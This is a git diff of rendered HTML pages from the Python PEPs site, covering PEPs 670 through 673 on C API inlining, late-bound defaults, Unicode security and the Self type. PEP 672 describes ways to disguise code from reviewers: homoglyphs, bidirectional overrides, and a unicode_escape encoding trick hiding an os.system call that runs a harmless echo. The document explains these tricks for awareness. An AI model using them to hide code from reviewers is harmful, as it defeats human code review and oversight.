Note that benchmarks should not be run on a Python debug build. +Moreover, using link-time optimization (LTO) and profile-guided optimization +(PGO) is recommended for best performance and reliable benchmarks. +PGO helps the compiler to decide if functions should be inlined or not.

+
+
+

Force inlining

+

The Py_ALWAYS_INLINE macro can be used to force inlining. This macro +uses __attribute__((always_inline)) with GCC and Clang, and +__forceinline with MSC.

+

Previous attempts to use Py_ALWAYS_INLINE didn’t show any benefit, and were +abandoned. See for example bpo-45094 +“Consider using __forceinline and __attribute__((always_inline)) on +static inline functions (Py_INCREF, Py_TYPE) for debug build”.

+

When the Py_INCREF() macro was converted to a static inline +function in 2018 (commit), +it was decided not to force inlining. The machine code was analyzed with +multiple C compilers and compiler options, and Py_INCREF() was always +inlined without having to force inlining. The only case where it was not +inlined was the debug build. See discussion in bpo-35059 “Convert Py_INCREF() and +PyObject_INIT() to inlined functions”.

+
+
+

Disabling inlining

+

On the other side, the Py_NO_INLINE macro can be used to disable +inlining. It can be used to reduce the stack memory usage, or to prevent +inlining on LTO+PGO builds, which generally inline code more aggressively: +see bpo-33720. The +Py_NO_INLINE macro uses __attribute__ ((noinline)) with GCC and +Clang, and __declspec(noinline) with MSC.

+

This technique is available, though we currently don’t know a concrete +function for which it would be useful. +Note that with macros, it is not possible to disable inlining at all.

+
+
+
+

Rejected Ideas

+
+

Keep macros, but fix some macro issues

+

Macros are always “inlined” with any C compiler.

+

The duplication of side effects can be worked around in the caller of +the macro.

+

People using macros should be considered “consenting adults”. People who +feel unsafe with macros should simply not use them.

+

These ideas are rejected because macros are error prone, and it is too easy +to miss a macro pitfall when writing and reviewing macro code. Moreover, macros +are harder to read and maintain than functions.

+
+
+
+

Post History

+

python-dev mailing list threads:

+ +
+
+

References

+
    +
  • bpo-45490: +[C API] PEP 670: Convert macros to functions in the Python C API +(October 2021).
  • +
  • What to do with unsafe macros +(March 2021).
  • +
  • bpo-43502: +[C-API] Convert obvious unsafe macros to static inline functions +(March 2021).
  • +
+
+
+

Version History

+
    +
  • Version 2:
      +
    • Stricter policy on not changing argument types and return type.
    • +
    • Better explain why pointer arguments require a cast to not emit new +compiler warnings.
    • +
    • Macros which can be used as l-values are no longer modified by the +PEP.
    • +
    • Macros having multiple return types are no longer modified by the +PEP.
    • +
    • Limited C API version 3.11 no longer casts pointer arguments.
    • +
    • No longer remove return values of macros “which should not have a +return value”.
    • +
    • Add “Macros converted to functions since Python 3.8” section.
    • +
    • Add “Benchmark comparing macros and static inline functions” +section.
    • +
    +
  • +
  • Version 1: First public version
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0670.rst

+

Last modified: 2023-10-04 23:18:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0671/index.html b/pep-0671/index.html new file mode 100644 index 00000000000..62dd81ba4a0 --- /dev/null +++ b/pep-0671/index.html @@ -0,0 +1,335 @@ + + + + + + + + PEP 671 – Syntax for late-bound function argument defaults | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 671 – Syntax for late-bound function argument defaults

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>
+
Discussions-To:
+
Python-Ideas thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
24-Oct-2021
+
Python-Version:
+
3.12
+
Post-History:
+
24-Oct-2021, +01-Dec-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

Function parameters can have default values which are calculated during +function definition and saved. This proposal introduces a new form of +argument default, defined by an expression to be evaluated at function +call time.

+
+
+

Motivation

+

Optional function arguments, if omitted, often have some sort of logical +default value. When this value depends on other arguments, or needs to be +reevaluated each function call, there is currently no clean way to state +this in the function header.

+

Currently-legal idioms for this include:

+
# Very common: Use None and replace it in the function
+def bisect_right(a, x, lo=0, hi=None, *, key=None):
+    if hi is None:
+        hi = len(a)
+
+# Also well known: Use a unique custom sentinel object
+_USE_GLOBAL_DEFAULT = object()
+def connect(timeout=_USE_GLOBAL_DEFAULT):
+    if timeout is _USE_GLOBAL_DEFAULT:
+        timeout = default_timeout
+
+# Unusual: Accept star-args and then validate
+def add_item(item, *optional_target):
+    if not optional_target:
+        target = []
+    else:
+        target = optional_target[0]
+
+
+

In each form, help(function) fails to show the true default value. Each +one has additional problems, too; using None is only valid if None is not +itself a plausible function parameter, the custom sentinel requires a global +constant; and use of star-args implies that more than one argument could be +given.

+
+
+

Specification

+

Function default arguments can be defined using the new => notation:

+
def bisect_right(a, x, lo=0, hi=>len(a), *, key=None):
+def connect(timeout=>default_timeout):
+def add_item(item, target=>[]):
+def format_time(fmt, time_t=>time.time()):
+
+
+

The expression is saved in its source code form for the purpose of inspection, +and bytecode to evaluate it is prepended to the function’s body.

+

Notably, the expression is evaluated in the function’s run-time scope, NOT the +scope in which the function was defined (as are early-bound defaults). This +allows the expression to refer to other arguments.

+

Multiple late-bound arguments are evaluated from left to right, and can refer +to previously-defined values. Order is defined by the function, regardless of +the order in which keyword arguments may be passed.

+
+
def prevref(word=”foo”, a=>len(word), b=>a//2): # Valid +def selfref(spam=>spam): # UnboundLocalError +def spaminate(sausage=>eggs + 1, eggs=>sausage - 1): # Confusing, don’t do this +def frob(n=>len(items), items=[]): # See below
+

Evaluation order is left-to-right; however, implementations MAY choose to do so +in two separate passes, first for all passed arguments and early-bound defaults, +and then a second pass for late-bound defaults. Otherwise, all arguments will be +assigned strictly left-to-right.

+
+

Rejected choices of spelling

+

While this document specifies a single syntax name=>expression, alternate +spellings are similarly plausible. The following spellings were considered:

+
def bisect(a, hi=>len(a)):
+def bisect(a, hi:=len(a)):
+def bisect(a, hi?=len(a)):
+def bisect(a, @hi=len(a)):
+
+
+

Since default arguments behave largely the same whether they’re early or late +bound, the chosen syntax hi=>len(a) is deliberately similar to the existing +early-bind syntax.

+

One reason for rejection of the := syntax is its behaviour with annotations. +Annotations go before the default, so in all syntax options, it must be +unambiguous (both to the human and the parser) whether this is an annotation, +a default, or both. The alternate syntax target:=expr runs the risk of +being misinterpreted as target:int=expr with the annotation omitted in +error, and may thus mask bugs. The chosen syntax target=>expr does not +have this problem.

+
+
+
+

How to Teach This

+

Early-bound default arguments should always be taught first, as they are the +simpler and more efficient way to evaluate arguments. Building on them, late +bound arguments are broadly equivalent to code at the top of the function:

+
def add_item(item, target=>[]):
+
+# Equivalent pseudocode:
+def add_item(item, target=<OPTIONAL>):
+    if target was omitted: target = []
+
+
+

A simple rule of thumb is: “target=expression” is evaluated when the function +is defined, and “target=>expression” is evaluated when the function is called. +Either way, if the argument is provided at call time, the default is ignored. +While this does not completely explain all the subtleties, it is sufficient to +cover the important distinction here (and the fact that they are similar).

+
+
+

Interaction with other proposals

+

PEP 661 attempts to solve one of the same problems as this does. It seeks to +improve the documentation of sentinel values in default arguments, where this +proposal seeks to remove the need for sentinels in many common cases. PEP 661 +is able to improve documentation in arbitrarily complicated functions (it +cites traceback.print_exception as its primary motivation, which has two +arguments which must both-or-neither be specified); on the other hand, many +of the common cases would no longer need sentinels if the true default could +be defined by the function. Additionally, dedicated sentinel objects can be +used as dictionary lookup keys, where PEP 671 does not apply.

+

A generic system for deferred evaluation has been proposed at times (not to be +confused with PEP 563 and PEP 649 which are specific to annotations). +While it may seem, on the surface, that late-bound argument defaults are of a +similar nature, they are in fact unrelated and orthogonal ideas, and both could +be of value to the language. The acceptance or rejection of this proposal would +not affect the viability of a deferred evaluation proposal, and vice versa. (A +key difference between generalized deferred evaluation and argument defaults is +that argument defaults will always and only be evaluated as the function begins +executing, whereas deferred expressions would only be realized upon reference.)

+
+
+

Implementation details

+

The following relates to the reference implementation, and is not necessarily +part of the specification.

+

Argument defaults (positional or keyword) have both their values, as already +retained, and an extra piece of information. For positional arguments, the +extras are stored in a tuple in __defaults_extra__, and for keyword-only, +a dict in __kwdefaults_extra__. If this attribute is None, it is +equivalent to having None for every argument default.

+

For each parameter with a late-bound default, the special value Ellipsis +is stored as the value placeholder, and the corresponding extra information +needs to be queried. If it is None, then the default is indeed the value +Ellipsis; otherwise, it is a descriptive string and the true value is +calculated as the function begins.

+

When a parameter with a late-bound default is omitted, the function will begin +with the parameter unbound. The function begins by testing for each parameter +with a late-bound default using a new opcode QUERY_FAST/QUERY_DEREF, and if +unbound, evaluates the original expression. This opcode (available only for +fast locals and closure variables) pushes True onto the stack if the given +local has a value, and False if not - meaning that it pushes False if LOAD_FAST +or LOAD_DEREF would raise UnboundLocalError, and True if it would succeed.

+

Out-of-order variable references are permitted as long as the referent has a +value from an argument or early-bound default.

+
+

Costs

+

When no late-bound argument defaults are used, the following costs should be +all that are incurred:

+
    +
  • Function objects require two additional pointers, which will be NULL
  • +
  • Compiling code and constructing functions have additional flag checks
  • +
  • Using Ellipsis as a default value will require run-time verification +to see if late-bound defaults exist.
  • +
+

These costs are expected to be minimal (on 64-bit Linux, this increases all +function objects from 152 bytes to 168), with virtually no run-time cost when +late-bound defaults are not used.

+
+
+

Backward incompatibility

+

Where late-bound defaults are not used, behaviour should be identical. Care +should be taken if Ellipsis is found, as it may not represent itself, but +beyond that, tools should see existing code unchanged.

+
+
+
+

References

+

https://github.com/rosuav/cpython/tree/pep-671

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0671.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0672/index.html b/pep-0672/index.html new file mode 100644 index 00000000000..dd55917d6e7 --- /dev/null +++ b/pep-0672/index.html @@ -0,0 +1,496 @@ + + + + + + + + PEP 672 – Unicode-related Security Considerations for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 672 – Unicode-related Security Considerations for Python

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
01-Nov-2021
+
Post-History:
+
01-Nov-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document explains possible ways to misuse Unicode to write Python +programs that appear to do something else than they actually do.

+

This document does not give any recommendations and solutions.

+
+
+

Introduction

+

Unicode is a system for handling all kinds of written language. +It aims to allow any character from any human language to be +used. Python code may consist of almost all valid Unicode characters. +While this allows programmers from all around the world to express themselves, +it also allows writing code that is potentially confusing to readers.

+

It is possible to misuse Python’s Unicode-related features to write code that +appears to do something else than what it does. +Evildoers could take advantage of this to trick code reviewers into +accepting malicious code.

+

The possible issues generally can’t be solved in Python itself without +excessive restrictions of the language. +They should be solved in code editors and review tools +(such as diff displays), by enforcing project-specific policies, +and by raising awareness of individual programmers.

+

This document purposefully does not give any solutions +or recommendations: it is rather a list of things to keep in mind.

+

This document is specific to Python. +For general security considerations in Unicode text and source code, +see Unicode technical reports [tr36], [tr39], and [tr55].

+
+
+

Acknowledgement

+

Investigation for this document was prompted by CVE-2021-42574, +Trojan Source Attacks, reported by Nicholas Boucher and Ross Anderson, +which focuses on Bidirectional override characters and homoglyphs in a variety +of programming languages.

+
+
+

Confusing Features

+

This section lists some Unicode-related features that can be surprising +or misusable.

+
+

ASCII-only Considerations

+

ASCII is a subset of Unicode, consisting of the most common symbols, numbers, +Latin letters and control characters.

+

While issues with the ASCII character set are generally well understood, +the’re presented here to help better understanding of the non-ASCII cases.

+
+

Confusables and Typos

+

Some characters look alike. +Before the age of computers, many mechanical typewriters lacked the keys for +the digits 0 and 1: users typed O (capital o) and l +(lowercase L) instead. Human readers could tell them apart by context only. +In programming languages, however, distinction between digits and letters is +critical – and most fonts designed for programmers make it easy to tell them +apart.

+

Similarly, in fonts designed for human languages, the uppercase “I” and +lowercase “l” can look similar. Or the letters “rn” may be virtually +indistinguishable from the single letter “m”. +Again, programmers’ fonts make these pairs of confusables +noticeably different.

+

However, what is “noticeably” different always depends on the context. +Humans tend to ignore details in longer identifiers: the variable name +accessibi1ity_options can still look indistinguishable from +accessibility_options, while they are distinct for the compiler. +The same can be said for plain typos: most humans will not notice the typo in +responsbility_chain_delegate.

+
+
+

Control Characters

+

Python generally considers all CR (\r), LF (\n), and CR-LF +pairs (\r\n) as an end of line characters. +Most code editors do as well, but there are editors that display “non-native” +line endings as unknown characters (or nothing at all), rather than ending +the line, displaying this example:

+
# Don't call this function:
+fire_the_missiles()
+
+
+

as a harmless comment like:

+
# Don't call this function:⬛fire_the_missiles()
+
+
+

CPython may treat the control character NUL (\0) as end of input, +but many editors simply skip it, possibly showing code that Python will not +run as a regular part of a file.

+

Some characters can be used to hide/overwrite other characters when source is +listed in common terminals. For example:

+
    +
  • BS (\b, Backspace) moves the cursor back, so the character after it +will overwrite the character before.
  • +
  • CR (\r, carriage return) moves the cursor to the start of line, +subsequent characters overwrite the start of the line.
  • +
  • SUB (\x1A, Ctrl+Z) means “End of text” on Windows. Some programs +(such as type) ignore the rest of the file after it.
  • +
  • ESC (\x1B) commonly initiates escape codes which allow arbitrary +control of the terminal.
  • +
+
+
+
+

Confusable Characters in Identifiers

+

Python is not limited to ASCII. +It allows characters of all scripts – Latin letters to ancient Egyptian +hieroglyphs – in identifiers (such as variable names). +See PEP 3131 for details and rationale. +Only “letters and numbers” are allowed, so while γάτα is a valid Python +identifier, 🐱 is not. (See Identifiers and keywords for details.)

+

Non-printing control characters are also not allowed in identifiers.

+

However, within the allowed set there is a large number of “confusables”. +For example, the uppercase versions of the Latin b, Greek β (Beta), and +Cyrillic в (Ve) often look identical: B, Β and В, respectively.

+

This allows identifiers that look the same to humans, but not to Python. +For example, all of the following are distinct identifiers:

+
    +
  • scope (Latin, ASCII-only)
  • +
  • scоpe (with a Cyrillic о)
  • +
  • scοpe (with a Greek ο)
  • +
  • ѕсоре (all Cyrillic letters)
  • +
+

Additionally, some letters can look like non-letters:

+
    +
  • The letter for the Hawaiian ʻokina looks like an apostrophe; +ʻHelloʻ is a Python identifier, not a string.
  • +
  • The East Asian word for ten looks like a plus sign, +so 十= 10 is a complete Python statement. (The “十” is a word: “ten” +rather than “10”.)
  • +
+
+

Note

+

The converse also applies – some symbols look like letters – but since +Python does not allow arbitrary symbols in identifiers, this is not an +issue.

+
+
+
+

Confusable Digits

+

Numeric literals in Python only use the ASCII digits 0-9 (and non-digits such +as . or e).

+

However, when numbers are converted from strings, such as in the int and +float constructors or by the str.format method, any decimal digit +can be used. For example ߅ (NKO DIGIT FIVE) or +(TAMIL DIGIT FIVE) work as the digit 5.

+

Some scripts include digits that look similar to ASCII ones, but have a +different value. For example:

+
>>> int('৪୨')
+42
+>>> '{٥}'.format('zero', 'one', 'two', 'three', 'four', 'five')
+five
+
+
+
+
+

Bidirectional Text

+

Some scripts, such as Hebrew or Arabic, are written right-to-left. +Phrases in such scripts interact with nearby text in ways that can be +surprising to people who aren’t familiar with these writing systems and their +computer representation.

+

The exact process is complicated, and explained in Unicode Standard Annex #9, +Unicode Bidirectional Algorithm.

+

Consider the following code, which assigns a 100-character string to +the variable s:

+
s = "X" * 100 #    "X" is assigned
+
+
+

When the X is replaced by the Hebrew letter א, the line becomes:

+
s = "א" * 100 #    "א" is assigned
+
+
+

This command still assigns a 100-character string to s, but +when displayed as general text following the Bidirectional Algorithm +(e.g. in a browser), it appears as s = "א" followed by a comment.

+

Other surprising examples include:

+
    +
  • In the statement ערך = 23, the variable ערך is set to the integer 23.
  • +
  • In the statement قيمة = ערך, the variable قيمة is set +to the value of ערך.
  • +
  • In the statement قيمة - (ערך ** 2), the value of ערך is squared and +then subtracted from قيمة. +The opening parenthesis is displayed as ).
  • +
+
+
+

Bidirectional Marks, Embeddings, Overrides and Isolates

+

Default reordering rules do not always yield the intended direction of text, so +Unicode provides several ways to alter it.

+

The most basic are directional marks, which are invisible but affect text +as a left-to-right (or right-to-left) character would. +Continuing with the s = "X" example above, in the next example the X is +replaced by the Latin x followed or preceded by a +right-to-left mark (U+200F). This assigns a 200-character string to s +(100 copies of x interspersed with 100 invisible marks), +but under Unicode rules for general text, it is rendered as s = "x" +followed by an ASCII-only comment:

+
s = "x‏" * 100 #    "‏x" is assigned
+
+
+

The directional embedding, override and isolate characters +are also invisible, but affect the ordering of all text after them until either +ended by a dedicated character, or until the end of line. +(Unicode specifies the effect to last until the end of a “paragraph” (see +Unicode Bidirectional Algorithm), +but allows tools to interpret newline characters as paragraph ends +(see Unicode Newline Guidelines). Most code editors and terminals do so.)

+

These characters essentially allow arbitrary reordering of the text that +follows them. Python only allows them in strings and comments, which does limit +their potential (especially in combination with the fact that Python’s comments +always extend to the end of a line), but it doesn’t render them harmless.

+
+
+

Normalizing identifiers

+

Python strings are collections of Unicode codepoints, not “characters”.

+

For reasons like compatibility with earlier encodings, Unicode often has +several ways to encode what is essentially a single “character”. +For example, all these are different ways of writing Å as a Python string, +each of which is unequal to the others.

+
    +
  • "\N{LATIN CAPITAL LETTER A WITH RING ABOVE}" (1 codepoint)
  • +
  • "\N{LATIN CAPITAL LETTER A}\N{COMBINING RING ABOVE}" (2 codepoints)
  • +
  • "\N{ANGSTROM SIGN}" (1 codepoint, but different)
  • +
+

For another example, the ligature has a dedicated Unicode codepoint, +even though it has the same meaning as the two letters fi.

+

Also, common letters frequently have several distinct variations. +Unicode provides them for contexts where the difference has some semantic +meaning, like mathematics. For example, some variations of n are:

+
    +
  • n (LATIN SMALL LETTER N)
  • +
  • 𝐧 (MATHEMATICAL BOLD SMALL N)
  • +
  • 𝘯 (MATHEMATICAL SANS-SERIF ITALIC SMALL N)
  • +
  • (FULLWIDTH LATIN SMALL LETTER N)
  • +
  • (SUPERSCRIPT LATIN SMALL LETTER N)
  • +
+

Unicode includes algorithms to normalize variants like these to a single +form, and Python identifiers are normalized. +(There are several normal forms; Python uses NFKC.)

+

For example, xn and xⁿ are the same identifier in Python:

+
>>> xⁿ = 8
+>>> xn
+8
+
+
+

… as is and fi, and as are the different ways to encode Å.

+

This normalization applies only to identifiers, however. +Functions that treat strings as identifiers, such as getattr, +do not perform normalization:

+
>>> class Test:
+...     def finalize(self):
+...         print('OK')
+...
+>>> Test().finalize()
+OK
+>>> Test().finalize()
+OK
+>>> getattr(Test(), 'finalize')
+Traceback (most recent call last):
+  ...
+AttributeError: 'Test' object has no attribute 'finalize'
+
+
+

This also applies when importing:

+
    +
  • import finalization performs normalization, and looks for a file +named finalization.py (and other finalization.* files).
  • +
  • importlib.import_module("finalization") does not normalize, +so it looks for a file named finalization.py.
  • +
+

Some filesystems independently apply normalization and/or case folding. +On some systems, finalization.py, finalization.py and +FINALIZATION.py are three distinct filenames; on others, some or all +of these name the same file.

+
+
+

Source Encoding

+

The encoding of Python source files is given by a specific regex on the first +two lines of a file, as per Encoding declarations. +This mechanism is very liberal in what it accepts, and thus easy to obfuscate.

+

This can be misused in combination with Python-specific special-purpose +encodings (see Text Encodings). +For example, with encoding: unicode_escape, characters like +quotes or braces can be hidden in an (f-)string, with many tools (syntax +highlighters, linters, etc.) considering them part of the string. +For example:

+
# For writing Japanese, you don't need an editor that supports
+# UTF-8 source encoding: unicode_escape sequences work just as well.
+
+import os
+
+message = '''
+This is "Hello World" in Japanese:
+\u3053\u3093\u306b\u3061\u306f\u7f8e\u3057\u3044\u4e16\u754c
+
+This runs `echo WHOA` in your shell:
+\u0027\u0027\u0027\u002c\u0028\u006f\u0073\u002e
+\u0073\u0079\u0073\u0074\u0065\u006d\u0028
+\u0027\u0065\u0063\u0068\u006f\u0020\u0057\u0048\u004f\u0041\u0027
+\u0029\u0029\u002c\u0027\u0027\u0027
+'''
+
+
+

Here, encoding: unicode_escape in the initial comment is an encoding +declaration. The unicode_escape encoding instructs Python to treat +\u0027 as a single quote (which can start/end a string), \u002c as +a comma (punctuator), etc.

+
+
+
+

Open Issues

+

We should probably write and publish:

+
    +
  • Recommendations for Text Editors and Code Tools
  • +
  • Recommendations for Programmers and Teams
  • +
  • Possible Improvements in Python
  • +
+
+
+

References

+
+
+
[tr36]
+
Unicode Technical Report #36: Unicode Security Considerations +http://www.unicode.org/reports/tr36/
+
+
[tr39]
+
Unicode® Technical Standard #39: Unicode Security Mechanisms +http://www.unicode.org/reports/tr39/
+
+
[tr55]
+
Unicode Technical Report #55: Unicode Source Code Handling +http://www.unicode.org/reports/tr55/
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0672.rst

+

Last modified: 2024-11-26 10:14:21 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0673/index.html b/pep-0673/index.html new file mode 100644 index 00000000000..a2f3df97a97 --- /dev/null +++ b/pep-0673/index.html @@ -0,0 +1,855 @@ + + + + + + + + PEP 673 – Self Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 673 – Self Type

+
+
Author:
+
Pradeep Kumar Srinivasan <gohanpra at gmail.com>, +James Hilton-Balfe <gobot1234yt at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
10-Nov-2021
+
Python-Version:
+
3.11
+
Post-History:
+
17-Nov-2021
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Self and +typing.Self for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP introduces a simple and intuitive way to annotate methods that return +an instance of their class. This behaves the same as the TypeVar-based +approach specified in PEP 484 +but is more concise and easier to follow.

+
+
+

Motivation

+

A common use case is to write a method that returns an instance of the same +class, usually by returning self.

+
class Shape:
+    def set_scale(self, scale: float):
+        self.scale = scale
+        return self
+
+Shape().set_scale(0.5)  # => should be Shape
+
+
+

One way to denote the return type is to specify it as the current class, say, +Shape. Using the method makes the type checker infer the type Shape, +as expected.

+
class Shape:
+    def set_scale(self, scale: float) -> Shape:
+        self.scale = scale
+        return self
+
+Shape().set_scale(0.5)  # => Shape
+
+
+

However, when we call set_scale on a subclass of Shape, the type +checker still infers the return type to be Shape. This is problematic in +situations such as the one shown below, where the type checker will return an +error because we are trying to use attributes or methods not present on the +base class.

+
class Circle(Shape):
+    def set_radius(self, r: float) -> Circle:
+        self.radius = r
+        return self
+
+Circle().set_scale(0.5)  # *Shape*, not Circle
+Circle().set_scale(0.5).set_radius(2.7)
+# => Error: Shape has no attribute set_radius
+
+
+

The present workaround for such instances is to define a TypeVar with the +base class as the bound and use it as the annotation for the self +parameter and the return type:

+
from typing import TypeVar
+
+TShape = TypeVar("TShape", bound="Shape")
+
+class Shape:
+    def set_scale(self: TShape, scale: float) -> TShape:
+        self.scale = scale
+        return self
+
+
+class Circle(Shape):
+    def set_radius(self, radius: float) -> Circle:
+        self.radius = radius
+        return self
+
+Circle().set_scale(0.5).set_radius(2.7)  # => Circle
+
+
+

Unfortunately, this is verbose and unintuitive. Because self is usually +not explicitly annotated, the above solution doesn’t immediately come to mind, +and even if it does, it is very easy to go wrong by forgetting either the +bound on the TypeVar(bound="Shape") or the annotation for self.

+

This difficulty means that users often give up and either use fallback types +like Any or just omit the type annotation completely, both of which make +the code less safe.

+

We propose a more intuitive and succinct way of expressing the above +intention. We introduce a special form Self that stands for a type +variable bound to the encapsulating class. For situations such as the one +above, the user simply has to annotate the return type as Self:

+
from typing import Self
+
+class Shape:
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+
+class Circle(Shape):
+    def set_radius(self, radius: float) -> Self:
+        self.radius = radius
+        return self
+
+
+

By annotating the return type as Self, we no longer have to declare a +TypeVar with an explicit bound on the base class. The return type Self +mirrors the fact that the function returns self and is easier to +understand.

+

As in the above example, the type checker will correctly infer the type of +Circle().set_scale(0.5) to be Circle, as expected.

+
+

Usage statistics

+

We analyzed popular +open-source projects and found that patterns like the above were used about +40% as often as popular types like dict or Callable. For example, +in typeshed alone, such “Self” types are used 523 times, compared to 1286 uses +of dict and 1314 uses of Callable as of October 2021. +This suggests that a Self type will be used quite often and users will +benefit a lot from the simpler approach above.

+

Users of Python types have also frequently requested this feature, +both on the proposal doc +and on GitHub.

+
+
+
+

Specification

+
+

Use in Method Signatures

+

Self used in the signature of a method is treated as if it were a +TypeVar bound to the class.

+
from typing import Self
+
+class Shape:
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+
+

is treated equivalently to:

+
from typing import TypeVar
+
+SelfShape = TypeVar("SelfShape", bound="Shape")
+
+class Shape:
+    def set_scale(self: SelfShape, scale: float) -> SelfShape:
+        self.scale = scale
+        return self
+
+
+

This works the same for a subclass too:

+
class Circle(Shape):
+    def set_radius(self, radius: float) -> Self:
+        self.radius = radius
+        return self
+
+
+

which is treated equivalently to:

+
SelfCircle = TypeVar("SelfCircle", bound="Circle")
+
+class Circle(Shape):
+    def set_radius(self: SelfCircle, radius: float) -> SelfCircle:
+        self.radius = radius
+        return self
+
+
+

One implementation strategy is to simply desugar the former to the latter in a +preprocessing step. If a method uses Self in its signature, the type of +self within a method will be Self. In other cases, the type of +self will remain the enclosing class.

+
+
+

Use in Classmethod Signatures

+

The Self type annotation is also useful for classmethods that return +an instance of the class that they operate on. For example, from_config in +the following snippet builds a Shape object from a given config.

+
class Shape:
+    def __init__(self, scale: float) -> None: ...
+
+    @classmethod
+    def from_config(cls, config: dict[str, float]) -> Shape:
+        return cls(config["scale"])
+
+
+

However, this means that Circle.from_config(...) is inferred to return a +value of type Shape, when in fact it should be Circle:

+
class Circle(Shape):
+    def circumference(self) -> float: ...
+
+shape = Shape.from_config({"scale": 7.0})
+# => Shape
+
+circle = Circle.from_config({"scale": 7.0})
+# => *Shape*, not Circle
+
+circle.circumference()
+# Error: `Shape` has no attribute `circumference`
+
+
+

The current workaround for this is unintuitive and error-prone:

+
Self = TypeVar("Self", bound="Shape")
+
+class Shape:
+    @classmethod
+    def from_config(
+        cls: type[Self], config: dict[str, float]
+    ) -> Self:
+        return cls(config["scale"])
+
+
+

We propose using Self directly:

+
from typing import Self
+
+class Shape:
+    @classmethod
+    def from_config(cls, config: dict[str, float]) -> Self:
+        return cls(config["scale"])
+
+
+

This avoids the complicated cls: type[Self] annotation and the TypeVar +declaration with a bound. Once again, the latter code behaves equivalently +to the former code.

+
+
+

Use in Parameter Types

+

Another use for Self is to annotate parameters that expect instances of +the current class:

+
Self = TypeVar("Self", bound="Shape")
+
+class Shape:
+    def difference(self: Self, other: Self) -> float: ...
+
+    def apply(self: Self, f: Callable[[Self], None]) -> None: ...
+
+
+

We propose using Self directly to achieve the same behavior:

+
from typing import Self
+
+class Shape:
+    def difference(self, other: Self) -> float: ...
+
+    def apply(self, f: Callable[[Self], None]) -> None: ...
+
+
+

Note that specifying self: Self is harmless, so some users may find it +more readable to write the above as:

+
class Shape:
+    def difference(self: Self, other: Self) -> float: ...
+
+
+
+
+

Use in Attribute Annotations

+

Another use for Self is to annotate attributes. One example is where we +have a LinkedList whose elements must be subclasses of the current class.

+
from dataclasses import dataclass
+from typing import Generic, TypeVar
+
+T = TypeVar("T")
+
+@dataclass
+class LinkedList(Generic[T]):
+    value: T
+    next: LinkedList[T] | None = None
+
+# OK
+LinkedList[int](value=1, next=LinkedList[int](value=2))
+# Not OK
+LinkedList[int](value=1, next=LinkedList[str](value="hello"))
+
+
+

However, annotating the next attribute as LinkedList[T] allows invalid +constructions with subclasses:

+
@dataclass
+class OrdinalLinkedList(LinkedList[int]):
+    def ordinal_value(self) -> str:
+        return as_ordinal(self.value)
+
+# Should not be OK because LinkedList[int] is not a subclass of
+# OrdinalLinkedList, # but the type checker allows it.
+xs = OrdinalLinkedList(value=1, next=LinkedList[int](value=2))
+
+if xs.next:
+    print(xs.next.ordinal_value())  # Runtime Error.
+
+
+

We propose expressing this constraint using next: Self | None:

+
from typing import Self
+
+@dataclass
+class LinkedList(Generic[T]):
+    value: T
+    next: Self | None = None
+
+@dataclass
+class OrdinalLinkedList(LinkedList[int]):
+    def ordinal_value(self) -> str:
+        return as_ordinal(self.value)
+
+xs = OrdinalLinkedList(value=1, next=LinkedList[int](value=2))
+# Type error: Expected OrdinalLinkedList, got LinkedList[int].
+
+if xs.next is not None:
+    xs.next = OrdinalLinkedList(value=3, next=None)  # OK
+    xs.next = LinkedList[int](value=3, next=None)  # Not OK
+
+
+

The code above is semantically equivalent to treating each attribute +containing a Self type as a property that returns that type:

+
from dataclasses import dataclass
+from typing import Any, Generic, TypeVar
+
+T = TypeVar("T")
+Self = TypeVar("Self", bound="LinkedList")
+
+
+class LinkedList(Generic[T]):
+    value: T
+
+    @property
+    def next(self: Self) -> Self | None:
+        return self._next
+
+    @next.setter
+    def next(self: Self, next: Self | None) -> None:
+        self._next = next
+
+class OrdinalLinkedList(LinkedList[int]):
+    def ordinal_value(self) -> str:
+        return str(self.value)
+
+
+
+
+

Use in Generic Classes

+

Self can also be used in generic class methods:

+
class Container(Generic[T]):
+    value: T
+    def set_value(self, value: T) -> Self: ...
+
+
+

This is equivalent to writing:

+
Self = TypeVar("Self", bound="Container[Any]")
+
+class Container(Generic[T]):
+    value: T
+    def set_value(self: Self, value: T) -> Self: ...
+
+
+

The behavior is to preserve the type argument of the object on which the +method was called. When called on an object with concrete type +Container[int], Self is bound to Container[int]. When called with +an object of generic type Container[T], Self is bound to +Container[T]:

+
def object_with_concrete_type() -> None:
+    int_container: Container[int]
